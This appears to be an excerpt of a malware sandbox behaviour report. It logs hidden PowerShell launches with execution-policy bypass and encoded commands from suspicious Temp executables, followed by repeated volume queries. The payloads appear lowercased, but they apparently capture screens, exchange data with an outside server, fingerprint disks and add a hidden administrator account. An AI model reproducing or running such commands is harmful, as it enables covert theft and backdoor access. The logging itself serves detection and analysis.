        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagadJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakagJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
